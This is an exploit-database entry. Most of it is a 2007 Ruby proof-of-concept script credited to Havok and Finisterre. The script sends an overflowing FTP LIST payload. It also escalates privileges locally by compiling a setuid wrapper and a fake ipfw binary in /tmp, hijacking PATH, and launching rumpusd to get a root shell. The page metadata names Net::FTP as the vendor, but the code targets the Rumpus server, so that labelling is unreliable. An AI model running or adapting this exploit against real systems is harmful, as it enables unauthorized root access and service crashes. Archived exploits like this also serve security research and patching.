header-logo
Suggest Exploit
vendor:
Net::FTP
by:
Lance M. Havok, Kevin Finisterre
7.5
CVSS
HIGH
Heap Buffer Overflow
CWE
Product Name: Net::FTP
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:ruby:net_ftp
Metasploit:
Other Scripts:
Platforms Tested: All platforms with Ruby and Net::FTP library
2007

FTP LIST heap buffer overflow

This script demonstrates a heap buffer overflow vulnerability in the FTP LIST command. It sends a payload of 251 bytes followed by specific values to trigger the overflow. This vulnerability allows an attacker to potentially execute arbitrary code or crash the FTP server.

Mitigation:

Apply the latest patches and updates from the vendor. Consider using a more secure FTP server implementation.
Source

Exploit-DB raw data:

#!/usr/bin/ruby
# Copyright (c) Lance M. Havok  <lmh [at] info-pull.com>
#               Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Proof of concept for issues described in MOAB-18-01-2007.

require 'net/ftp'
require 'socket'

bugselected = (ARGV[0] || 0).to_i
target_host = (ARGV[1] || "localhost")
target_user = (ARGV[2] || "anonymous")
target_pass = (ARGV[3] || "rumproast")

def list_bug(o)
  payload =   "A" * 251
  payload <<  [0x41424344].pack("V")
  payload <<  [0x61626364].pack("V")
  payload <<  [0x30313233].pack("V")
  payload <<  [0xdeadface].pack("V")
  o.list(payload)
end

def local_priv_escalation()
  wrapper   = 'int main() { setuid(0); setgid(0); system("/bin/sh -i"); return 0; }'
  fake_ipfw = 'int main() { system("/usr/sbin/chown root: /tmp/shX; /bin/chmod 4755 /tmp/shX"); return 0; }'
  command_line =  "echo '#{wrapper}' > /tmp/test.c && cc -o /tmp/shX /tmp/test.c && "    +
                  "echo '#{fake_ipfw}' > /tmp/ipfw.c && cc -o /tmp/ipfw /tmp/ipfw.c && " +
                  'export PATH="/tmp/:$PATH" && /usr/local/Rumpus/rumpusd'
  system command_line
  sleep 1
  puts "++ Enjoy root shell..."
  system "/tmp/shX"
end

case bugselected
  when 0
    puts "++ FTP LIST heap buffer overflow..."
    Net::FTP.open(target_host) do |ftp|
      ftp.login("#{target_user}","#{target_pass}")
      list_bug(ftp)
    end
  when 1
    puts "++ Local privilege escalation..."
    local_priv_escalation()
end

# milw0rm.com [2007-01-19]